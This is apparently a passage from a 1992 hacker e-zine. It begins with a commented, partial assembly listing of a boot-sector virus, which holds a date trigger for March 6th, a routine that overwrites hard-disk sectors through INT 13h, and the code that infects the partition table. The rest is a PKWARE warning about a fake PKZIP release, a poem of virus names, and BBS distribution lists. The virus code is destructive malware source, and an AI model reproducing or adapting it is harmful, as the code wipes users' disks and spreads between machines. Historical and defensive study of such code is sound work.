          mov  ds:data_5e,ax       ; (0000:7C0A=49EBh)
          mov  ax,ds:data_2e       ; (0000:004E=70h)
          mov  ds:data_6e,ax       ; (0000:7C0C=2A3Ch)
          mov  ax,ds:data_3e       ; (0000:0413=280h)
          dec  ax
          dec  ax
          mov  ds:data_3e,ax       ; (0000:0413=280h)
          mov  cl,6
          shl  ax,cl               ; Shift w/zeros fill
          mov  es,ax
          mov  ds:data_4e,ax       ; (0000:7C05=203Ch)
          mov  ax,0Eh
          mov  ds:data_1e,ax       ; (0000:004C=1DB1h)
          mov  ds:data_2e,es       ; (0000:004E=70h)
          mov  cx,1BEh
          mov  si,7C00h
          xor  di,di               ; Zero register
          cld                      ; Clear direction
          rep  movsb               ; Rep while cx>0 Mov [si]
          jmp  dword ptr cs:data_11e; to es:[di] (694E:7C03=0)
          db   33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
          db   0Eh, 1Fh, 0B8h, 1, 2, 0BBh      ;          cd 13
          db   0, 7Ch, 8Bh, 0Eh, 8, 0
          db   83h, 0F9h, 7, 75h, 7, 0BAh
          db   80h, 0, 0CDh, 13h, 0EBh, 2Bh
          db   8Bh, 0Eh, 8, 0, 0BAh, 0
          db   1, 0CDh, 13h, 72h, 20h, 0Eh
          db   7, 0B8h, 1, 2, 0BBh, 0
          db   2, 0B9h, 1, 0, 0BAh, 80h
          db   0, 0CDh, 13h, 72h, 0Eh, 33h
          db   0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
          db   4Fh, 0ADh, 3Bh, 47h, 2
          db   75h, 49h
loc_7:;check if it is time to nuke
          xor  cx,cx               ; Zero register
          mov  ah,4
          int  1Ah ; Real time clock   ah=func 04h don't work on an xt
                                   ; read date cx=year, dx=mon/day
          cmp  dx,306h             ; See if March 6th
          je   loc_8               ; Jump if equal to nuking subs
          retf                     ; Return to launch command.com
loc_8:;get ready
          xor  dx,dx               ; Zero register
          mov  cx,1
loc_9:;run 7 times nuke 31.5 megs of hd
          mov  ax,309h
          mov  si,ds:data_8e       ; (694E:0008=0)
          cmp  si,3
          je   loc_10              ; Jump if equal
          mov  al,0Eh
          cmp  si,0Eh
          je   loc_10              ; Jump if equal
          mov  dl,80h
          mov  byte ptr ds:data_7e,4; (694E:0007=0)
          mov  al,11h
loc_10: ;nuke away
          mov  bx,5000h
          mov  es,bx
          int  13h                 ; Disk  dl=drive a: ah=func 03h
                                   ;  write sectors from mem es:bx
          jnc  loc_11              ; Jump if carry=0
          xor  ah,ah               ; Zero register
          int  13h                 ; Disk  dl=drive a: ah=func 00h
                                   ;  reset disk, al=return status
loc_11: ;rest for loc-9 nuking
          inc  dh
          cmp  dh,ds:data_7e       ; (694E:0007=0)
          jb   loc_9               ; Jump if below
          xor  dh,dh               ; Zero register
          inc  ch
          jmp  short loc_9         ; (0250)
loc_12:;time to infect a floppie or hard dirve
          mov  cx,7
          mov  ds:data_8e,cx       ; (694E:0008=0)
          mov  ax,301h
          mov  dx,80h
          int  13h                ; Disk  dl=drive a: ah=func 03h infect flopie
                                   ;  write sectors from mem es:bx
          jc   loc_7               ; Jump if carry Set
          mov  si,3BEh
          mov  di,1BEh
          mov  cx,21h
          rep  movsw               ; Rep while cx>0 Mov [si]
          mov  ax,301h                 : to es:[di]
          xor  bx,bx               ; Zero register
          inc  cl
          int  13h               ; Disk  dl=drive a: ah=func 03h lets infect hd
                                   ;  write sectors from mem es:bx
;*        jmp  short loc_13        ;*(02E0)
          db   0EBh, 32h
          db   1, 4, 11h, 0, 80h, 0
          db   5, 5, 32h, 1, 0, 0
          db   0, 0, 0
          db   53h, 53h, 20h, 20h, 43h, 4Fh
          db   4Dh
          db   58 dup (0)
          db   55h, 0AAh

seg_a          ends

;Last notes this virus looks like a poor hack job on the stoned virus.
;It is kinda cool in the fact that it is hard to get out of the partition table
;even if you nuke the partition table it will live on even if you replace it.
;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
;this virus uses int 1ah which doesn't work on an XT system.
;the virus isn't actually 512 but that is how much it writes.
;it moves the boot area of a floppy to the last sector on the disk
;and on a harddrive it moves it to the last sector in the root directory
;This should show you all how much the media can over do it on things
;since this is really a lame virus, to tell you the truth there is a lot better
;ones out there.
;This in no way is a complete listing of the code for the virus.
;Nor is it the best since i'm not the best at Assembly.
;Done by Visionary.
;BTW to who ever wrote this virus... Get a life!

-------------------------------------------------------------------------------

03/16/1992

    WARNING!  WARNING!  WARNING!  WARNING!  WARNING!  WARNING!  WARNING!
    --------------------------------------------------------------------

    There is a file being circulated on BBS's called PKZ201.ZIP or
    PKZ201.EXE or similar, and that claims to be version 2.01 of
    PKZIP but in fact is a hacked version of PKZIP 1.93 Alpha.

    As of the date of this writing, the latest version of PKZIP is
    version 1.10.

    If you see the files PKZ201.ZIP or PKZ201.EXE on any BBS or
    on-line system, please ask the SysOp of that system to remove
    the files IMMEDIATELY, and please contact PKWARE to report
    where the files were seen.

    Of course, because of this PKWARE will never release a version
    of PKZIP with the version number 2.01.

    If you have any information about the source of PKZ201.EXE or
    PKZ201.ZIP, please report it to PKWARE immediately, either:

    by Voice at 414-354-8699
    by BBS   at 414-354-8670
    by FAX   at 414-354-8559
    or by mail:

                PKWARE Inc.
                9025 N. Deerwood Drive
                Brown Deer, WI 53223 USA


                                             Sincerely,


                                                Phil Katz
                                                President, PKWARE Inc.
-------------------------------------------------------------------------------

 A VIRUS POEM
 By: Brooks Hilliard

 There's Beta and Manta,Get Password and CB
  Amstrad and Leningrad,F-Word and BeBe
 Haifa,Messina,Enigma,Gergana
  Tequila,Azuza and Nina,Vienna.
 There's Smily and Shirly,Israeli and Anthrax
  and Yankee and Miky,Raubkopi,Oropax.
 There's Newcom and Checksum and Boojum and Prism
  and Incom and Phantom and Planinum and Skism.
 There's Scrambler and Squeaker and Joker,Disk Killer,
  Filler Despoiler and Green Caterpillar.
 Theres Jojo,Ohio and Spanish April Fool,
  Frodo and Turbo,Jerusalem Mule.
 There's Sadist and Chemist and Cinderella.
  Burger and Ogre and Finger and Kalah.
 Azusa,Eliza,Zargosa and Sotcha,
  Macedonia,Albania,Necrophilia and Gotcha.
 Theres Palette and Merritt, and Friday the 13th
  and Saddam and Virdem and Saturday 14th.
 There's Typo,Empire,and Topo,and Ping Pong,
  Mosquito,and Fire,and Psycho,and Lao Doung.
 Theres USSR and Ambulance Car,
  And Wonder,Surrender and Redstar and Spar
 Bugares,Vorohezh,Xabaras,and Flash
  Microbes and Irish,Addidas and Crash.
 There's Timid,New Zealand,Bloody! and Tiny DI.
 There's Stupid and Lovechild and Froggie and Lehigh.
 There's Stoned and Scotts Valley and Happy N.Y.
 There's Cascade,Black Wizard and also Bad Guy.
 There's Frere Jacques,Maraudar,Invader,
  Vacsina Rybka and also Darth Vader.
 There's Barcelona and Nomenkla-tara,
  and then Montezuma and Hydra and Cara.
 There's Music,Icelandic,Generic and Whale,
 There's Lisbon and Pentagon and Phalcon and Yale.
  Pirate and Mutant and Fumble and Hello
 There's Patient and Advent and Michelangelo.
 That's 130 viruses,smaller and greater
  If you don't get protected,You'll lose all your data.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [9]: IIRG Distribution Sites




                   //////    //////     ///////     ////////
                    //        //       //    //    //
                   //        //       ///////     //   ////
                  //        //       //    //    //     //
               ////// *  //////  *  //     // * /////////




    IIRG World HQ:           Dark Shadows
                             19.2/9600 Baud HST
                             24 Hours a Day
                             1.2 Gigs Online
                             (203)-628-9660


   IIRG Distribution Site 1: Restaurant at the End of the Universe
                             2400/1200 Baud (3 Nodes!!)
                             24 hours a day
                             130 Megs of Files
                             (203)567-8903 2 Nodes 2400
                             (203)567-4808 1 Node 1200

   IIRG Distribution Site 2: The Generic Access BBS
                             INC New England Regional District HQs
                             IUD New England Regional District HQs
                             1.2 gigs online
                             USR Dual Standard HST
                             NO Ratios
                             (508) 281-3961

   IIRG Distribution Site 3: The Sanitarium
                             Sysops: Morbid Angel [INC/ACID]
                                     Spectral Illusion [ACID/RAZOR]
                             IIRG Distribution Site
                             ACID Member Board
                             INC Courier Board
                             RAZOR 1911 Courier Board
                             VISA World Headquarters
                             (817)PRI-VATE


   IIRG Distribution Site 4: CTHH 666
                             2400 - 57.6 Baud
                             Sysop: Beelzebub
                             HAU AB! East Coast Headquarters
                             Hackers Alliance Of The Underground Abuse
                             I.I.R.G. Distribution Site

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [9]: Phantasy Distribution Sites

 Phantasy's Distribution Site's are continually growing, we apologize if you
 called a board and didn't find the Mag. Network Distribution Sites will
 have the Issues first, we suggest calling one of them if a problem does
 arise.


  1. Lightning Systems
     (414) 363-4282
     Sixty Million Bytes OnLine
     USRobotics Dual Standard HST/V.32bis
     2400 thru 14.4k v.32bis/HST

  2. Sycamore Elite
     19,200-1200 Baud HST, 24 Hours a day
     (815) 895-5573

  3. The Works BBS at (617-861-8976)
     Largest Text Files BBS in the world, 3500+ text files online.
     2400-300 Baud, 24 Hours a day

  4. Pipers Pit BBS
     19,200-9600 HST ONLY!!
     24 Hours a Day
     THG Distro Site 1300 Megs
     (203)PRI-VATE [2 Nodes]

  5. Blitzkrieg BBS                  TAP Magazine
     (502)-499-8933                  P.O. BOX 20264
     Home of TAP MAgazine            Louisville,KY. 40250-0264

  6. The Dickinson Nightlight
     (713)-337-1452
     Der WeltanSchauung Distro Site (World View Magazine)
     Phantasy Distro Site

  7. Lucid Dreams
     SysOp: Louis Cypher    Number: (713)522-0709
     Running: Flashback  Speed: USR DS 38.4
     0-1 Day Warez    1400 T-Files
     300+ Virii  Net: TcH


PHANTASY is also available on:

             1. RIPCO BBS (312)528-5020


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                       PHANTASY(C) IIRG 1991,1992
                        May Odin Guide Your Way!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-